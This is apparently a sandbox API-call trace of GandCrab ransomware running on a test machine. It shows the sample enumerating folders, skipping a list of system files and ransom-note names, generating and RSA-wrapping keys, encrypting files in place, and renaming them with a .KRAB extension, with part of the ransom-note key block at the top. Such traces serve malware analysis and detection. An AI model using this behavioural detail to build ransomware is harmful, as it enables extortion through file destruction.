KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.057] WriteFile (in: hFile=0x44c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.057] CloseHandle (hObject=0x44c) returned 1 [0057.058] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.058] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.058] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x109)) [0057.058] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.059] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.059] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.059] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock") returned 82 [0057.059] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x44c [0057.065] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.065] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned 59 [0057.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*" [0057.065] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbdce0 [0057.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.066] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.066] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.066] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.066] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock" [0057.066] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.066] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 87 [0057.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a08d2ca4dee3d.lock") returned 82 [0057.066] lstrlenW (lpString=".lock") returned 5 [0057.066] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.067] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.067] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.067] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.067] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.067] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.067] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt" [0057.067] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.068] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt.KRAB") returned 80 [0057.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt") returned 75 [0057.068] lstrlenW (lpString=".txt") returned 4 [0057.068] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.068] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.068] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt") returned 75 [0057.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\KRAB-DECRYPT.txt") returned 75 [0057.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.069] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.069] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.069] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.069] lstrcmpW (lpString1="sonar_policy.xml", lpString2=".") returned 1 [0057.069] lstrcmpW (lpString1="sonar_policy.xml", lpString2="..") returned 1 [0057.069] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="sonar_policy.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" [0057.069] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.070] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.KRAB") returned 80 [0057.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0057.070] lstrlenW (lpString=".xml") returned 4 [0057.070] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.070] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".xml ") returned 5 [0057.070] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0057.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0057.070] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="desktop.ini") returned 1 [0057.070] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="autorun.inf") returned 1 [0057.070] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntuser.dat") returned 1 [0057.070] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="iconcache.db") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="bootsect.bak") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="boot.ini") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntuser.dat.log") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="thumbs.db") returned -1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntldr") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="NTDETECT.COM") returned 1 [0057.071] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="Bootfont.bin") returned 1 [0057.071] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.071] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0057.072] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.072] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.072] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.072] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0057.072] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.072] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.073] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0057.073] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.074] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.077] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.077] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0057.077] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.077] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.078] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0057.078] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd820) returned 1 [0057.078] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.078] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.079] GetLastError () returned 0x0 [0057.079] CryptDestroyKey (hKey=0xfbd820) returned 1 [0057.079] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.079] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0057.079] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd560) returned 1 [0057.079] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.079] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.080] GetLastError () returned 0x0 [0057.080] CryptDestroyKey (hKey=0xfbd560) returned 1 [0057.080] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.080] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0057.082] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0057.083] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.083] ReadFile (in: hFile=0x454, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e7fc*=0x4949, lpOverlapped=0x0) returned 1 [0057.116] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0xffffb6b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.116] WriteFile (in: hFile=0x454, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x4949, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x4949, lpOverlapped=0x0) returned 1 [0057.116] WriteFile (in: hFile=0x454, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0057.116] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.120] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.122] CloseHandle (hObject=0x454) returned 1 [0057.123] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.123] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml.krab")) returned 1 [0057.124] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.124] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0057.124] FindClose (in: hFindFile=0xfbdce0 | out: hFindFile=0xfbdce0) returned 1 [0057.125] CloseHandle (hObject=0x44c) returned 1 [0057.125] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.125] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0057.125] CloseHandle (hObject=0x430) returned 1 [0057.125] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0057.125] FindClose (in: hFindFile=0xfbd3a0 | out: hFindFile=0xfbd3a0) returned 1 [0057.125] CloseHandle (hObject=0x43c) returned 1 [0057.125] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.125] lstrcmpW (lpString1="AiUWcWXY-.csv", lpString2=".") returned 1 [0057.126] lstrcmpW (lpString1="AiUWcWXY-.csv", lpString2="..") returned 1 [0057.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="AiUWcWXY-.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv" [0057.126] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.126] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv.KRAB") returned 56 [0057.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv") returned 51 [0057.126] lstrlenW (lpString=".csv") returned 4 [0057.126] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.126] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".csv ") returned 5 [0057.126] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv") returned 51 [0057.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv") returned 51 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="desktop.ini") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="autorun.inf") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="ntuser.dat") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="iconcache.db") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="bootsect.bak") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="boot.ini") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="ntuser.dat.log") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="thumbs.db") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="KRAB-DECRYPT.html") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="CRAB-DECRYPT.txt") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="ntldr") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="NTDETECT.COM") returned -1 [0057.127] lstrcmpiW (lpString1="AiUWcWXY-.csv", lpString2="Bootfont.bin") returned -1 [0057.127] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.128] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.128] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.128] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.129] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.129] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.129] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 